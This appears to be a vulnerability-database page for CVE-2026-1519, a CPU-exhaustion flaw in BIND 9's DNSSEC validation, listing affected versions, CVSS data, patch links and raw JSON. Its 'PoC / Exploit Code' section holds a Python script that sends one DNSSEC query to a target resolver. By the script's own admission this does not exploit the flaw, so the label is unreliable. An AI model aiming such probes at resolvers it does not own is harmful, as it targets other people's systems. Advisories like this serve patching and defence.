Security Vulnerability Report
CVE-2026-1519 CVSS 7.5 HIGH

CVE-2026-1519

Published: 2026-03-25 14:16:33
Last Modified: 2026-05-21 15:24:02

Description

If a BIND resolver is performing DNSSEC validation and encounters a maliciously crafted zone, the resolver may consume excessive CPU. Authoritative-only servers are generally unaffected, although there are circumstances where authoritative servers may make recursive queries (see: https://kb.isc.org/docs/why-does-my-authoritative-server-make-recursive-queries). This issue affects BIND 9 versions 9.11.0 through 9.16.50, 9.18.0 through 9.18.46, 9.20.0 through 9.20.20, 9.21.0 through 9.21.19, 9.11.3-S1 through 9.16.50-S1, 9.18.11-S1 through 9.18.46-S1, and 9.20.9-S1 through 9.20.20-S1.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:isc:bind:*:*:*:*:-:*:*:* - VULNERABLE
BIND 9.11.0 - 9.16.50
BIND 9.18.0 - 9.18.46
BIND 9.20.0 - 9.20.20
BIND 9.21.0 - 9.21.19
BIND 9.11.3-S1 - 9.16.50-S1
BIND 9.18.11-S1 - 9.18.46-S1
BIND 9.20.9-S1 - 9.20.20-S1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
PoC concept for CVE-2026-1519.

Sends a DNS query with the DNSSEC OK (DO) bit set to trigger DNSSEC
validation on a target resolver.

Note: actual exploitation requires a maliciously crafted zone served by an
authoritative name server controlled by the attacker; this script only sends
the query that makes the resolver start validating.
"""
import dns.flags
import dns.message
import dns.query


def trigger_poc(target_ip):
    # Build an A-record query and request DNSSEC validation:
    # AD in the header flags, DO in the EDNS flags.
    query = dns.message.make_query('example.com', 'A')
    query.flags |= dns.flags.AD
    query.use_edns(edns=0, ednsflags=dns.flags.DO)
    try:
        # Send the query to the target resolver over UDP
        response = dns.query.udp(query, target_ip, timeout=5)
        print(f"Query sent to {target_ip}, response received: {response.id}")
        print("Monitor target CPU usage for potential spike.")
    except Exception as e:
        print(f"Error: {e}")


if __name__ == "__main__":
    # Replace with the IP of the vulnerable BIND resolver
    target = "192.168.1.1"
    trigger_poc(target)
```

References

https://downloads.isc.org/isc/bind9/9.18.47 (Patch)
https://downloads.isc.org/isc/bind9/9.20.21 (Patch)
https://downloads.isc.org/isc/bind9/9.21.20 (Patch)
https://kb.isc.org/docs/cve-2026-1519 (Vendor Advisory)
https://lists.debian.org/debian-lts-announce/2026/04/msg00008.html (Issue Tracking, Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-1519", "sourceIdentifier": "[email protected]", "published": "2026-03-25T14:16:33.110", "lastModified": "2026-05-21T15:24:01.930", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "If a BIND resolver is performing DNSSEC validation and encounters a maliciously crafted zone, the resolver may consume excessive CPU. Authoritative-only servers are generally unaffected, although there are circumstances where authoritative servers may make recursive queries (see: https://kb.isc.org/docs/why-does-my-authoritative-server-make-recursive-queries).\nThis issue affects BIND 9 versions 9.11.0 through 9.16.50, 9.18.0 through 9.18.46, 9.20.0 through 9.20.20, 9.21.0 through 9.21.19, 9.11.3-S1 through 9.16.50-S1, 9.18.11-S1 through 9.18.46-S1, and 9.20.9-S1 through 9.20.20-S1."}, {"lang": "es", "value": "Si un resolvedor BIND está realizando validación DNSSEC y encuentra una zona creada maliciosamente, el resolvedor puede consumir CPU excesiva. Los servidores solo autoritativos generalmente no se ven afectados, aunque hay circunstancias en las que los servidores autoritativos pueden realizar consultas recursivas (ver: https://kb.isc.org/docs/why-does-my-authoritative-server-make-recursive-queries).\nEste problema afecta a las versiones de BIND 9 9.11.0 a 9.16.50, 9.18.0 a 9.18.46, 9.20.0 a 9.20.20, 9.21.0 a 9.21.19, 9.11.3-S1 a 9.16.50-S1, 9.18.11-S1 a 9.18.46-S1, y 9.20.9-S1 a 9.20.20-S1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", 
"type": "Secondary", "description": [{"lang": "en", "value": "CWE-606"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:isc:bind:*:*:*:*:-:*:*:*", "versionStartIncluding": "9.11.0", "versionEndIncluding": "9.16.50", "matchCriteriaId": "9EC5B9B1-25F2-48CA-9E8A-59D8E81D408A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:isc:bind:*:*:*:*:-:*:*:*", "versionStartIncluding": "9.18.0", "versionEndExcluding": "9.18.47", "matchCriteriaId": "4DC8EC77-8200-45EC-B006-73E48A67A1B8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:isc:bind:*:*:*:*:-:*:*:*", "versionStartIncluding": "9.20.0", "versionEndExcluding": "9.20.21", "matchCriteriaId": "2C0EF5D0-68A6-4E00-985B-523D9B243E49"}, {"vulnerable": true, "criteria": "cpe:2.3:a:isc:bind:*:*:*:*:-:*:*:*", "versionStartIncluding": "9.21.0", "versionEndExcluding": "9.21.20", "matchCriteriaId": "B1DD0950-5CBD-49B2-8007-5E96B3C4FB1B"}]}]}], "references": [{"url": "https://downloads.isc.org/isc/bind9/9.18.47", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://downloads.isc.org/isc/bind9/9.20.21", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://downloads.isc.org/isc/bind9/9.21.20", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://kb.isc.org/docs/cve-2026-1519", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://lists.debian.org/debian-lts-announce/2026/04/msg00008.html", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Issue Tracking", "Third Party Advisory"]}]}}